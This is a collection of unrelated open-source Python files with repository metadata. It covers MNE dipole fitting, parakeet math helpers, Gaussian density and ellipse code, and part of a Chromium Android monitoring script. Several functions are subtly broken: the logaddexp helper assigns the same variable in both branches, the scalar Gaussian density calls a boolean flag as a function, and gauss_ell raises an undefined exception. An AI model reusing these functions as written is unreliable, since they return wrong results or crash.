    """Fit a single time point of data.

    Returns ``(rd, amp, ori, gof, residual)`` for this time instant, the
    shape expected by ``_fit_dipoles`` which unpacks ``r[0]`` .. ``r[4]``.
    """
    B = np.dot(whitener, B_orig)
    # make constraint function to keep the solver within the inner skull
    if isinstance(fwd_data['inner_skull'], dict):  # bem
        surf = fwd_data['inner_skull']
        constraint = partial(_surface_constraint, surf=surf,
                             min_dist_to_inner_skull=min_dist_to_inner_skull)
    else:  # sphere
        surf = None
        R, r0 = fwd_data['inner_skull']
        constraint = partial(_sphere_constraint, r0=r0,
                             R_adj=R - min_dist_to_inner_skull)
        del R, r0
    # Find a good starting point (find_best_guess in C)
    B2 = np.dot(B, B)
    if B2 == 0:
        warn('Zero field found for time %s' % t)
        # BUGFIX: return a full 5-tuple (with a zero residual) so callers
        # that unpack pos/amp/ori/gof/residual do not IndexError here --
        # previously only 4 values were returned on this path.
        return np.zeros(3), 0, np.zeros(3), 0, np.zeros_like(B_orig)
    idx = np.argmin([_fit_eval(guess_rrs[[fi], :], B, B2, fwd_svd)
                     for fi, fwd_svd in enumerate(guess_data['fwd_svd'])])
    x0 = guess_rrs[idx]
    fun = partial(_fit_eval, B=B, B2=B2, fwd_data=fwd_data, whitener=whitener)
    # Tested minimizers:
    #    Simplex, BFGS, CG, COBYLA, L-BFGS-B, Powell, SLSQP, TNC
    # Several were similar, but COBYLA won for having a handy constraint
    # function we can use to ensure we stay inside the inner skull /
    # smallest sphere
    rd_final = fmin_cobyla(fun, x0, (constraint,), consargs=(),
                           rhobeg=5e-2, rhoend=5e-5, disp=False)
    # Compute the dipole moment at the final point
    Q, gof, residual = _fit_Q(fwd_data, whitener, proj_op, B, B2, B_orig,
                              rd_final, ori=ori)
    amp = np.sqrt(np.dot(Q, Q))
    norm = 1. if amp == 0. else amp
    ori = Q / norm
    msg = '---- Fitted : %7.1f ms' % (1000. * t)
    if surf is not None:
        dist_to_inner_skull = _compute_nearest(
            surf['rr'], rd_final[np.newaxis, :], return_dists=True)[1][0]
        msg += (", distance to inner skull : %2.4f mm"
                % (dist_to_inner_skull * 1000.))
    logger.info(msg)
    return rd_final, amp, ori, gof, residual
def _fit_dipole_fixed(min_dist_to_inner_skull, B_orig, t, guess_rrs,
                      guess_data, fwd_data, whitener, proj_op,
                      fmin_cobyla, ori):
    """Fit data using a fixed position (and optionally fixed orientation).

    Returns ``(pos, amp, ori, gof, residual)`` -- the same arity as
    ``_fit_dipole`` so that ``_fit_dipoles`` can unpack both uniformly.
    """
    B = np.dot(whitener, B_orig)
    B2 = np.dot(B, B)
    if B2 == 0:
        warn('Zero field found for time %s' % t)
        # BUGFIX: match the success-path arity (5 values, incl. residual);
        # the previous 4-element return broke unpacking in _fit_dipoles.
        return np.zeros(3), 0, np.zeros(3), 0, np.zeros_like(B_orig)
    # Compute the dipole moment
    Q, gof, residual = _fit_Q(guess_data, whitener, proj_op, B, B2, B_orig,
                              rd=None, ori=ori)
    if ori is None:
        amp = np.sqrt(np.dot(Q, Q))
        norm = 1. if amp == 0. else amp
        ori = Q / norm
    else:
        amp = np.dot(Q, ori)
    # No corresponding 'logger' message here because it should go *very* fast
    return guess_rrs[0], amp, ori, gof, residual
@verbose
def fit_dipole(evoked, cov, bem, trans=None, min_dist=5., n_jobs=1,
               pos=None, ori=None, verbose=None):
    """Fit a dipole
    Parameters
    ----------
    evoked : instance of Evoked
        The dataset to fit.
    cov : str | instance of Covariance
        The noise covariance.
    bem : str | dict
        The BEM filename (str) or a loaded sphere model (dict).
    trans : str | None
        The head<->MRI transform filename. Must be provided unless BEM
        is a sphere model.
    min_dist : float
        Minimum distance (in milimeters) from the dipole to the inner skull.
        Must be positive. Note that because this is a constraint passed to
        a solver it is not strict but close, i.e. for a ``min_dist=5.`` the
        fits could be 4.9 mm from the inner skull.
    n_jobs : int
        Number of jobs to run in parallel (used in field computation
        and fitting).
    pos : ndarray, shape (3,) | None
        Position of the dipole to use. If None (default), sequential
        fitting (different position and orientation for each time instance)
        is performed. If a position (in head coords) is given as an array,
        the position is fixed during fitting.
        .. versionadded:: 0.12
    ori : ndarray, shape (3,) | None
        Orientation of the dipole to use. If None (default), the
        orientation is free to change as a function of time. If an
        orientation (in head coordinates) is given as an array, ``pos``
        must also be provided, and the routine computes the amplitude and
        goodness of fit of the dipole at the given position and orientation
        for each time instant.
        .. versionadded:: 0.12
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).
    Returns
    -------
    dip : instance of Dipole or DipoleFixed
        The dipole fits. A :class:`mne.DipoleFixed` is returned if
        ``pos`` and ``ori`` are both not None.
    residual : ndarray, shape (n_meeg_channels, n_times)
        The good M-EEG data channels with the fitted dipolar activity
        removed.
    See Also
    --------
    mne.beamformer.rap_music
    Notes
    -----
    .. versionadded:: 0.9.0
    """
    # This could eventually be adapted to work with other inputs, these
    # are what is needed:
    evoked = evoked.copy()
    # Determine if a list of projectors has an average EEG ref
    if _needs_eeg_average_ref_proj(evoked.info):
        raise ValueError('EEG average reference is mandatory for dipole '
                         'fitting.')
    if min_dist < 0:
        raise ValueError('min_dist should be positive. Got %s' % min_dist)
    if ori is not None and pos is None:
        raise ValueError('pos must be provided if ori is not None')
    data = evoked.data
    info = evoked.info
    times = evoked.times.copy()
    comment = evoked.comment
    # Convert the min_dist to meters
    min_dist_to_inner_skull = min_dist / 1000.
    del min_dist
    # Figure out our inputs
    neeg = len(pick_types(info, meg=False, eeg=True, exclude=[]))
    if isinstance(bem, string_types):
        logger.info('BEM               : %s' % bem)
    if trans is not None:
        logger.info('MRI transform     : %s' % trans)
        mri_head_t, trans = _get_trans(trans)
    else:
        # No trans given: assume head and MRI frames coincide (sphere model)
        mri_head_t = Transform('head', 'mri', np.eye(4))
    bem = _setup_bem(bem, bem, neeg, mri_head_t, verbose=False)
    if not bem['is_sphere']:
        if trans is None:
            raise ValueError('mri must not be None if BEM is provided')
        # Find the best-fitting sphere
        inner_skull = _bem_find_surface(bem, 'inner_skull')
        inner_skull = inner_skull.copy()
        R, r0 = _fit_sphere(inner_skull['rr'], disp=False)
        # r0 back to head frame for logging
        r0 = apply_trans(mri_head_t['trans'], r0[np.newaxis, :])[0]
        logger.info('Head origin       : '
                    '%6.1f %6.1f %6.1f mm rad = %6.1f mm.'
                    % (1000 * r0[0], 1000 * r0[1], 1000 * r0[2], 1000 * R))
    else:
        r0 = bem['r0']
        if len(bem.get('layers', [])) > 0:
            R = bem['layers'][0]['rad']
            kind = 'rad'
        else:  # MEG-only
            # Use the minimum distance to the MEG sensors as the radius then
            R = np.dot(linalg.inv(info['dev_head_t']['trans']),
                       np.hstack([r0, [1.]]))[:3]  # r0 -> device
            R = R - [info['chs'][pick]['loc'][:3]
                     for pick in pick_types(info, meg=True, exclude=[])]
            if len(R) == 0:
                raise RuntimeError('No MEG channels found, but MEG-only '
                                   'sphere model used')
            R = np.min(np.sqrt(np.sum(R * R, axis=1)))  # use dist to sensors
            kind = 'max_rad'
        logger.info('Sphere model      : origin at (% 7.2f % 7.2f % 7.2f) mm, '
                    '%s = %6.1f mm'
                    % (1000 * r0[0], 1000 * r0[1], 1000 * r0[2], kind, R))
        inner_skull = [R, r0]  # NB sphere model defined in head frame
    r0_mri = apply_trans(invert_transform(mri_head_t)['trans'],
                         r0[np.newaxis, :])[0]
    accurate = False  # can be an option later (shouldn't make big diff)
    # Deal with DipoleFixed cases here
    if pos is not None:
        fixed_position = True
        pos = np.array(pos, float)
        if pos.shape != (3,):
            raise ValueError('pos must be None or a 3-element array-like,'
                             ' got %s' % (pos,))
        logger.info('Fixed position    : %6.1f %6.1f %6.1f mm'
                    % tuple(1000 * pos))
        if ori is not None:
            ori = np.array(ori, float)
            if ori.shape != (3,):
                raise ValueError('oris must be None or a 3-element array-like,'
                                 ' got %s' % (ori,))
            norm = np.sqrt(np.sum(ori * ori))
            if not np.isclose(norm, 1):
                raise ValueError('ori must be a unit vector, got length %s'
                                 % (norm,))
            logger.info('Fixed orientation  : %6.4f %6.4f %6.4f mm'
                        % tuple(ori))
        else:
            logger.info('Free orientation   : <time-varying>')
        fit_n_jobs = 1  # only use 1 job to do the guess fitting
    else:
        fixed_position = False
        # Eventually these could be parameters, but they are just used for
        # the initial grid anyway
        guess_grid = 0.02  # MNE-C uses 0.01, but this is faster w/similar perf
        guess_mindist = max(0.005, min_dist_to_inner_skull)
        guess_exclude = 0.02
        logger.info('Guess grid        : %6.1f mm' % (1000 * guess_grid,))
        if guess_mindist > 0.0:
            logger.info('Guess mindist     : %6.1f mm'
                        % (1000 * guess_mindist,))
        if guess_exclude > 0:
            logger.info('Guess exclude     : %6.1f mm'
                        % (1000 * guess_exclude,))
        logger.info('Using %s MEG coil definitions.'
                    % ("accurate" if accurate else "standard"))
        fit_n_jobs = n_jobs
    if isinstance(cov, string_types):
        logger.info('Noise covariance  : %s' % (cov,))
        cov = read_cov(cov, verbose=False)
    logger.info('')
    _print_coord_trans(mri_head_t)
    _print_coord_trans(info['dev_head_t'])
    logger.info('%d bad channels total' % len(info['bads']))
    # Forward model setup (setup_forward_model from setup.c)
    ch_types = [channel_type(info, idx) for idx in range(info['nchan'])]
    megcoils, compcoils, megnames, meg_info = [], [], [], None
    eegels, eegnames = [], []
    if 'grad' in ch_types or 'mag' in ch_types:
        megcoils, compcoils, megnames, meg_info = \
            _prep_meg_channels(info, exclude='bads',
                               accurate=accurate, verbose=verbose)
    if 'eeg' in ch_types:
        eegels, eegnames = _prep_eeg_channels(info, exclude='bads',
                                              verbose=verbose)
    # Ensure that MEG and/or EEG channels are present
    if len(megcoils + eegels) == 0:
        raise RuntimeError('No MEG or EEG channels found.')
    # Whitener for the data
    logger.info('Decomposing the sensor noise covariance matrix...')
    picks = pick_types(info, meg=True, eeg=True)
    # In case we want to more closely match MNE-C for debugging:
    # from .io.pick import pick_info
    # from .cov import prepare_noise_cov
    # info_nb = pick_info(info, picks)
    # cov = prepare_noise_cov(cov, info_nb, info_nb['ch_names'], verbose=False)
    # nzero = (cov['eig'] > 0)
    # n_chan = len(info_nb['ch_names'])
    # whitener = np.zeros((n_chan, n_chan), dtype=np.float)
    # whitener[nzero, nzero] = 1.0 / np.sqrt(cov['eig'][nzero])
    # whitener = np.dot(whitener, cov['eigvec'])
    whitener = _get_whitener_data(info, cov, picks, verbose=False)
    # Proceed to computing the fits (make_guess_data)
    if fixed_position:
        # A single fixed position acts as a one-point guess "grid"
        guess_src = dict(nuse=1, rr=pos[np.newaxis], inuse=np.array([True]))
        logger.info('Compute forward for dipole location...')
    else:
        logger.info('\n---- Computing the forward solution for the guesses...')
        guess_src = _make_guesses(inner_skull, r0_mri,
                                  guess_grid, guess_exclude, guess_mindist,
                                  n_jobs=n_jobs)[0]
        # grid coordinates go from mri to head frame
        transform_surface_to(guess_src, 'head', mri_head_t)
        logger.info('Go through all guess source locations...')
    # inner_skull goes from mri to head frame
    if isinstance(inner_skull, dict):
        transform_surface_to(inner_skull, 'head', mri_head_t)
    if fixed_position:
        # Verify the user-supplied position actually lies inside the
        # inner skull (or sphere) with the required clearance
        if isinstance(inner_skull, dict):
            check = _surface_constraint(pos, inner_skull,
                                        min_dist_to_inner_skull)
        else:
            check = _sphere_constraint(pos, r0,
                                       R_adj=R - min_dist_to_inner_skull)
        if check <= 0:
            raise ValueError('fixed position is %0.1fmm outside the inner '
                             'skull boundary' % (-1000 * check,))
    # C code computes guesses w/sphere model for speed, don't bother here
    fwd_data = dict(coils_list=[megcoils, eegels], infos=[meg_info, None],
                    ccoils_list=[compcoils, None], coil_types=['meg', 'eeg'],
                    inner_skull=inner_skull)
    # fwd_data['inner_skull'] in head frame, bem in mri, confusing...
    _prep_field_computation(guess_src['rr'], bem, fwd_data, n_jobs,
                            verbose=False)
    guess_fwd, guess_fwd_orig, guess_fwd_scales = _dipole_forwards(
        fwd_data, whitener, guess_src['rr'], n_jobs=fit_n_jobs)
    # decompose ahead of time
    guess_fwd_svd = [linalg.svd(fwd, overwrite_a=False, full_matrices=False)
                     for fwd in np.array_split(guess_fwd,
                                               len(guess_src['rr']))]
    guess_data = dict(fwd=guess_fwd, fwd_svd=guess_fwd_svd,
                      fwd_orig=guess_fwd_orig, scales=guess_fwd_scales)
    del guess_fwd, guess_fwd_svd, guess_fwd_orig, guess_fwd_scales  # destroyed
    pl = '' if guess_src['nuse'] == 1 else 's'
    logger.info('[done %d source%s]' % (guess_src['nuse'], pl))
    # Do actual fits
    # Restrict data to the good M/EEG channels used for fitting
    data = data[picks]
    ch_names = [info['ch_names'][p] for p in picks]
    proj_op = make_projector(info['projs'], ch_names, info['bads'])[0]
    fun = _fit_dipole_fixed if fixed_position else _fit_dipole
    out = _fit_dipoles(
        fun, min_dist_to_inner_skull, data, times, guess_src['rr'],
        guess_data, fwd_data, whitener, proj_op, ori, n_jobs)
    if fixed_position and ori is not None:
        # DipoleFixed
        # amplitude (out[1]) and gof (out[3]) traces become two synthetic
        # "channels" ('dip 01' and 'goodness') in the output info below
        data = np.array([out[1], out[3]])
        out_info = deepcopy(info)
        loc = np.concatenate([pos, ori, np.zeros(6)])
        out_info['chs'] = [
            dict(ch_name='dip 01', loc=loc, kind=FIFF.FIFFV_DIPOLE_WAVE,
                 coord_frame=FIFF.FIFFV_COORD_UNKNOWN, unit=FIFF.FIFF_UNIT_AM,
                 coil_type=FIFF.FIFFV_COIL_DIPOLE,
                 unit_mul=0, range=1, cal=1., scanno=1, logno=1),
            dict(ch_name='goodness', loc=np.zeros(12),
                 kind=FIFF.FIFFV_GOODNESS_FIT, unit=FIFF.FIFF_UNIT_AM,
                 coord_frame=FIFF.FIFFV_COORD_UNKNOWN,
                 coil_type=FIFF.FIFFV_COIL_NONE,
                 unit_mul=0, range=1., cal=1., scanno=2, logno=100)]
        for key in ['hpi_meas', 'hpi_results', 'projs']:
            out_info[key] = list()
        for key in ['acq_pars', 'acq_stim', 'description', 'dig',
                    'experimenter', 'hpi_subsystem', 'proj_id', 'proj_name',
                    'subject_info']:
            out_info[key] = None
        out_info._update_redundant()
        out_info._check_consistency()
        dipoles = DipoleFixed(out_info, data, times, evoked.nave,
                              evoked._aspect_kind, evoked.first, evoked.last,
                              comment)
    else:
        dipoles = Dipole(times, out[0], out[1], out[2], out[3], comment)
    residual = out[4]
    logger.info('%d time points fitted' % len(dipoles.times))
    return dipoles, residual
|
wronk/mne-python
|
mne/dipole.py
|
Python
|
bsd-3-clause
| 38,186
|
[
"Mayavi"
] |
afe09af55627b3c509515b0be0971fbeb2567f84d9d711fda039c8f16cc577ab
|
from ..frontend import jit
import numpy as np
@jit
def conjugate(x):
    """
    For now we don't have complex numbers so this is just the identity function
    """
    # NOTE: becomes a true complex conjugate once complex dtypes exist
    return x
@jit
def real(x):
    """
    For now we don't have complex types, so real is just the identity function
    """
    # NOTE: becomes the real-part extraction once complex dtypes exist
    return x
def _scalar_sign(x):
if x > 0:
return 1
elif x < 0:
return -1
else:
return 0
@jit
def sign(x):
    # Elementwise sign: map applies _scalar_sign across x under parakeet
    return map(_scalar_sign, x)
@jit
def reciprocal(x):
    # 1/x with no special handling of x == 0
    return 1 / x
@jit
def rad2deg(rad):
    # Degrees per radian = 180 / pi (pi hard-coded at double precision)
    return rad * 180 / 3.141592653589793
@jit
def deg2rad(deg):
    # Radians per degree = pi / 180 (pi hard-coded at double precision)
    return deg * 3.141592653589793 / 180
@jit
def hypot(x,y):
    # sqrt(x^2 + y^2); NOTE: may overflow for very large x or y, unlike
    # the rescaled algorithm used by np.hypot
    return np.sqrt(x**2 + y**2)
@jit
def square(x):
    # x * x, avoiding the more general power operator
    return x * x
def _logaddexp_scalar(x, y):
"""
Copied from BioPython (http://biopython.org/)
"""
if x < y:
bigger = x
smaller = y
else:
bigger = x
smaller = y
diff = smaller - bigger
if diff < -100:
return bigger
return bigger + np.log1p(np.exp(diff))
@jit
def logaddexp(x, y):
    # Elementwise log(exp(x) + exp(y)) via the scalar helper
    return map(_logaddexp_scalar, x, y)
@jit
def log2_1p(x):
    # log2(1 + x) computed as log1p(x) / log(2) for accuracy near x == 0
    return (1.0 / np.log(2)) * np.log1p(x)
@jit
def logaddexp2(x, y):
    # Base-2 analogue of logaddexp: log2(2**x + 2**y), selecting the larger
    # argument elementwise with where() to keep 2**(-|diff|) from overflowing
    diff = x - y
    return np.where(diff > 0, x + log2_1p(2 ** -diff) , y + log2_1p(2 ** diff))
@jit
def true_divide(x, y):
    """
    Not exactly true divide, since I guess it's sometimes supposed to stay an int
    """
    # Adding 0.0 promotes integer operands to floats before dividing
    return (x + 0.0) / (y + 0.0)
@jit
def floor_divide(x, y):
    # Divide, then round toward negative infinity
    return np.floor(x / y)
|
pombredanne/parakeet
|
parakeet/lib/math.py
|
Python
|
bsd-3-clause
| 1,470
|
[
"Biopython"
] |
b11e8fc4f0276fbe94bae26e8b98c102e64ebd5af802c0db4edbb611f5723ba2
|
#! /usr/bin/python
#
# Copyrighted David Cournapeau
# Last Change: Sat Jun 02 07:00 PM 2007 J
# New version, with default numpy ordering.
import numpy as N
import numpy.linalg as lin
from numpy.random import randn
from scipy.stats import chi2
# Error classes
class DenError(Exception):
    """Base class for exceptions in this module.

    Attributes:
        message -- explanation of the error
    """
    # NOTE: the previous docstring documented an "expression" attribute
    # that was never stored; only the message is kept.
    def __init__(self, message):
        # Forward to Exception so args, repr, and pickling behave normally
        Exception.__init__(self, message)
        self.message = message

    def __str__(self):
        return self.message
#============
# Public API
#============
# The following function do all the fancy stuff to check that parameters
# are Ok, and call the right implementation if args are OK.
def gauss_den(x, mu, va, log = False, axis = -1):
    """ Compute multivariate Gaussian density at points x for
    mean mu and variance va along specified axis:
    requirements:
        * mean must be rank 0 (1d) or rank 1 (multi variate gaussian)
        * va must be rank 0 (1d), rank 1(multi variate, diag covariance) or rank 2
        (multivariate, full covariance).
        * in 1 dimension case, any rank for mean and va is ok, as long as their size
        is 1 (eg they contain only 1 element)
    Caution: if x is rank 1, it is assumed you have a 1d problem. You cannot compute
    the gaussian densities of only one sample of dimension d; for this, you have
    to use a rank 2 !
    If log is True, than the log density is returned
    (useful for underflow ?)"""
    # If data is rank 1, then we have 1 dimension problem.
    if x.ndim == 1:
        if not N.size(mu) == 1:
            raise DenError("for 1 dimension problem, mean must have only one element")
        if not N.size(va) == 1:
            # BUGFIX: this message previously said "mean" (copy/paste error)
            raise DenError("for 1 dimension problem, variance must have only one element")
        return _scalar_gauss_den(x, mu, va, log)
    # If data is rank 2, then we may have 1 dimension or multi-variate problem
    elif x.ndim == 2:
        oaxis = (axis + 1) % 2
        d = x.shape[oaxis]
        # Get away with 1d case now
        if d == 1:
            return _scalar_gauss_den(x, mu, va, log)
        # Now, d > 1 (numpy attributes should be valid on mean and va now)
        if not N.size(mu) == d or not mu.ndim == 1:
            raise DenError("data is %d dimension, but mean's shape is %s" \
                    % (d, N.shape(mu)) + " (should be (%d,))" % d)
        isfull = (va.ndim == 2)
        if not (N.size(va) == d or (isfull and va.shape[0] == va.shape[1] == d)):
            raise DenError("va has an invalid shape or number of elements")
        if isfull:
            # Full covariance: orient the mean to match the data layout
            if oaxis == 0:
                return _full_gauss_den(x, mu[:, N.newaxis], va, log, axis)
            else:
                return _full_gauss_den(x, mu, va, log, axis)
        else:
            return _diag_gauss_den(x, mu, va, log, axis)
    else:
        raise RuntimeError("Sorry, only rank up to 2 supported")
# To plot a confidence ellipse from multi-variate gaussian pdf
def gauss_ell(mu, va, dim = [0, 1], npoints = 100, level = 0.39):
    """Given a mean and covariance of a multi-variate gaussian, return
    npoints points describing the confidence ellipse at the given level
    (all points lie on the boundary inside which a sample falls with
    probability equal to level).

    Returns the x and y coordinates of the ellipse."""
    sel = N.array(dim)
    if mu.size < 2:
        raise RuntimeError("this function only make sense for dimension 2 and more")
    # Decide whether va describes a diagonal or a full covariance.
    if mu.size == va.size:
        cov_kind = 'diag'
    elif va.ndim == 2:
        if va.shape[0] != va.shape[1]:
            raise DenError("variance not square")
        cov_kind = 'full'
    else:
        raise DenError("mean and variance are not dim conformant")
    # If X ~ N(mu, va), then [X' * va^(-1) * X] ~ Chi2 with 2 degrees of
    # freedom; its quantile at `level` gives the Mahalanobis radius.
    radius = N.sqrt(chi2(2).ppf(level))
    # Parameterize a circle of npoints points and scale it to that radius.
    angles = N.linspace(0, 2 * N.pi, npoints)
    circle = radius * N.array([N.cos(angles), N.sin(angles)])
    # Restrict mean/covariance to the two dimensions of interest.
    mu = mu[dim]
    if cov_kind == 'diag':
        va = va[dim]
        pts = N.outer(mu, N.ones(npoints))
        pts += N.dot(N.diag(N.sqrt(va)), circle)
    elif cov_kind == 'full':
        va = va[sel, :][:, sel]
        # Map the circle through a square root of va (cholesky factor).
        # WARN: scipy differs from matlab here; scipy's convention is
        # va = cova * cova' whereas matlab uses va = cova' * cova, so take
        # care when comparing results with matlab!
        cova = lin.cholesky(va)
        pts = N.outer(mu, N.ones(npoints))
        pts += N.dot(cova, circle)
    else:
        raise DenParam("var mode not recognized")
    return pts[0, :], pts[1, :]
#=============
# Private Api
#=============
# Those 3 functions do almost all the actual computation
def _scalar_gauss_den(x, mu, va, log):
""" This function is the actual implementation
of gaussian pdf in scalar case. It assumes all args
are conformant, so it should not be used directly
Call gauss_den instead"""
inva = 1/va
fac = (2*N.pi) ** (-1/2.0) * N.sqrt(inva)
y = ((x-mu) ** 2) * -0.5 * inva
if not log:
y = fac * N.exp(y.ravel())
else:
y = y + log(fac)
return y
def _diag_gauss_den(x, mu, va, log, axis):
""" This function is the actual implementation
of gaussian pdf in scalar case. It assumes all args
are conformant, so it should not be used directly
Call gauss_den instead"""
# Diagonal matrix case
d = mu.size
if axis % 2 == 0:
x = N.swapaxes(x, 0, 1)
if not log:
inva = 1/va[0]
fac = (2*N.pi) ** (-d/2.0) * N.sqrt(inva)
y = (x[0] - mu[0]) ** 2 * inva * -0.5
for i in range(1, d):
inva = 1/va[i]
fac *= N.sqrt(inva)
y += (x[i] - mu[i]) ** 2 * inva * -0.5
y = fac * N.exp(y)
else:
y = _scalar_gauss_den(x[0], mu[0], va[0], log)
for i in range(1, d):
y += _scalar_gauss_den(x[i], mu[i], va[i], log)
return y
def _full_gauss_den(x, mu, va, log, axis):
""" This function is the actual implementation
of gaussian pdf in full matrix case.
It assumes all args are conformant, so it should
not be used directly Call gauss_den instead
Does not check if va is definite positive (on inversible
for that matter), so the inverse computation and/or determinant
would throw an exception."""
d = mu.size
inva = lin.inv(va)
fac = 1 / N.sqrt( (2*N.pi) ** d * N.fabs(lin.det(va)))
# # Slow version (does not work since version 0.6)
# n = N.size(x, 0)
# y = N.zeros(n)
# for i in range(n):
# y[i] = N.dot(x[i,:],
# N.dot(inva, N.transpose(x[i,:])))
# y *= -0.5
# we are using a trick with sum to "emulate"
# the matrix multiplication inva * x without any explicit loop
if axis % 2 == 1:
y = N.dot(inva, (x-mu))
y = -0.5 * N.sum(y * (x-mu), 0)
else:
y = N.dot((x-mu), inva)
y = -0.5 * N.sum(y * (x-mu), 1)
if not log:
y = fac * N.exp(y)
else:
y = y + N.log(fac)
return y
if __name__ == "__main__":
    import pylab
    #=========================================
    # Test plotting a simple diag 2d variance:
    #=========================================
    va = N.array([5, 3])
    mu = N.array([2, 3])
    # Generate a multivariate gaussian of mean mu and covariance va.
    # Bug fix: randn requires integer dimensions; passing the float 1e3
    # raises a TypeError on modern numpy.
    X = randn(2, 1000)
    Yc = N.dot(N.diag(N.sqrt(va)), X)
    Yc = Yc.transpose() + mu
    # Plotting
    Xe, Ye = gauss_ell(mu, va, npoints = 100)
    pylab.figure()
    pylab.plot(Yc[:, 0], Yc[:, 1], '.')
    pylab.plot(Xe, Ye, 'r')
    #=========================================
    # Test plotting a simple full 2d variance:
    #=========================================
    va = N.array([[0.2, 0.1],[0.1, 0.5]])
    mu = N.array([0, 3])
    # Generate a multivariate gaussian of mean mu and covariance va
    # (same integer-size fix as above).
    X = randn(1000, 2)
    Yc = N.dot(lin.cholesky(va), X.transpose())
    Yc = Yc.transpose() + mu
    # Plotting
    Xe, Ye = gauss_ell(mu, va, npoints = 100, level=0.95)
    pylab.figure()
    pylab.plot(Yc[:, 0], Yc[:, 1], '.')
    pylab.plot(Xe, Ye, 'r')
    pylab.show()
|
jhmadhav/pynopticon
|
src/em/densities2.py
|
Python
|
gpl-3.0
| 8,876
|
[
"Gaussian"
] |
663e2aa33a1eb70d814eb973351f686c88e461a07ca9150e27e9705d3466941a
|
#!/usr/bin/python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# 'top'-like memory/network polling for Android apps.
import argparse
import curses
import os
import re
import sys
import time
from operator import sub
_SRC_PATH = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..'))
sys.path.append(os.path.join(_SRC_PATH, 'third_party', 'catapult', 'devil'))
from devil.android import device_errors
from devil.android import device_utils
sys.path.append(os.path.join(_SRC_PATH, 'build', 'android'))
import devil_chromium
class Utils(object):
  """A helper class to hold various utility methods."""

  @staticmethod
  def FindLines(haystack, needle):
    """Returns the entries of |haystack| that contain the substring
    |needle|."""
    return [line for line in haystack if needle in line]
class Validator(object):
  """A helper class with validation methods for argparse."""

  @staticmethod
  def ValidatePath(path):
    """An argparse validation method to make sure a file path is writable.

    Accepts |path| if it already exists or if its parent directory is
    writable; raises ArgumentTypeError otherwise."""
    if os.path.exists(path):
      return path
    elif os.access(os.path.dirname(path), os.W_OK):
      return path
    raise argparse.ArgumentTypeError("%s is an invalid file path" % path)

  @staticmethod
  def ValidatePdfPath(path):
    """An argparse validation method to make sure a pdf file path is writable.

    Validates a file path to make sure it is writable and also appends '.pdf'
    if necessary."""
    # Bug fix: os.path.splitext returns the extension *with* its leading dot
    # ('.pdf'), so the original comparison against 'pdf' was always unequal
    # and '.pdf' was appended even to paths already ending in it
    # (e.g. 'a.pdf' became 'a.pdf.pdf').
    if os.path.splitext(path)[-1].lower() != '.pdf':
      path = path + '.pdf'
    return Validator.ValidatePath(path)

  @staticmethod
  def ValidateNonNegativeNumber(val):
    """An argparse validation method to make sure a number is not negative."""
    ival = int(val)
    if ival < 0:
      raise argparse.ArgumentTypeError("%s is a negative integer" % val)
    return ival
class Timer(object):
  """A helper class to track timestamps based on when this program was
  started"""
  # Wall-clock time captured at class-definition (module import) time; all
  # timestamps are measured relative to this instant.
  starting_time = time.time()

  @staticmethod
  def GetTimestamp():
    """A helper method to return the time (in seconds) since this program was
    started."""
    now = time.time()
    return now - Timer.starting_time
class DeviceHelper(object):
  """A helper class with various generic device interaction methods."""
  @staticmethod
  def __GetUserIdForProcessName(adb, process_name):
    """Returns the userId of the application associated by |pid| or None if
    not found.

    Runs 'dumpsys package <name>' over |adb| and parses the first
    'userId=' line out of the output."""
    try:
      # Sub-processes (e.g. 'app:renderer') share the package of the parent
      # process, whose name precedes the ':'.
      process_name = process_name.split(':')[0]
      cmd = ['dumpsys', 'package', process_name]
      user_id_lines = adb.RunShellCommand(' '.join(cmd), large_output=True)
      user_id_lines = Utils.FindLines(user_id_lines, 'userId=')
      if not user_id_lines:
        return None
      # Split on whitespace or '=' so 'userId=10011' yields
      # ['userId', '10011'].
      columns = re.split('\s+|=', user_id_lines[0].strip())
      if len(columns) >= 2:
        return columns[1]
    except device_errors.AdbShellCommandFailedError:
      # Best effort: a failed shell command is treated as "not found".
      pass
    return None
  @staticmethod
  def GetDeviceModel(adb):
    """Returns the model of the device with the |adb| connection."""
    return adb.GetProp('ro.product.model').strip()
  @staticmethod
  def GetDeviceToTrack(preset=None):
    """Returns a device serial to connect to. If |preset| is specified it will
    return |preset| if it is connected and |None| otherwise. If |preset| is not
    specified it will return the first connected device."""
    devices = [d.adb.GetDeviceSerial()
               for d in device_utils.DeviceUtils.HealthyDevices()]
    if not devices:
      return None
    if preset:
      return preset if preset in devices else None
    return devices[0]
  @staticmethod
  def GetPidsToTrack(adb, default_pid=None, process_filter=None):
    """Returns a list of tuples of (userid, pids, process name) based on the
    input arguments. If |default_pid| is specified it will return that pid if
    it exists. If |process_filter| is specified it will return the pids of
    processes with that string in the name. If both are specified it will
    intersect the two. The returned result is sorted based on userid."""
    pids = []
    try:
      cmd = ['ps']
      pid_lines = adb.RunShellCommand(' '.join(cmd), large_output=True)
      # Narrow the candidate lines with substring matches first; the precise
      # per-column checks happen in the loop below.
      if default_pid:
        pid_lines = Utils.FindLines(pid_lines, str(default_pid))
      if process_filter:
        pid_lines = Utils.FindLines(pid_lines, process_filter)
      for line in pid_lines:
        data = re.split('\s+', line.strip())
        # 'ps' output: column 1 is the pid, the last column is the name.
        pid = data[1]
        name = data[-1]
        # Confirm that the pid and name match. Using a regular grep isn't
        # reliable when doing it on the whole 'ps' input line.
        pid_matches = not default_pid or pid == str(default_pid)
        name_matches = not process_filter or name.find(process_filter) != -1
        if pid_matches and name_matches:
          userid = DeviceHelper.__GetUserIdForProcessName(adb, name)
          pids.append((userid, pid, name))
    except device_errors.AdbShellCommandFailedError:
      # Best effort: return whatever was collected before the failure.
      pass
    return sorted(pids, key=lambda tup: tup[0])
class NetworkHelper(object):
  """A helper class to query basic network usage of an application."""
  @staticmethod
  def QueryNetwork(adb, userid):
    """Queries the device for network information about the application with a
    user id of |userid|. It will return a list of values:
    [ Download Background, Upload Background, Download Foreground, Upload
    Foreground ]. If the application is not found it will return
    [ 0, 0, 0, 0 ]."""
    results = [0, 0, 0, 0]
    if not userid:
      return results
    try:
      # Parsing indices for scanning a row from /proc/net/xt_qtaguid/stats.
      # The application id
      userid_idx = 3
      # Whether or not the transmission happened with the application in the
      # background (0) or foreground (1).
      bg_or_fg_idx = 4
      # The number of bytes received.
      rx_idx = 5
      # The number of bytes sent.
      tx_idx = 7
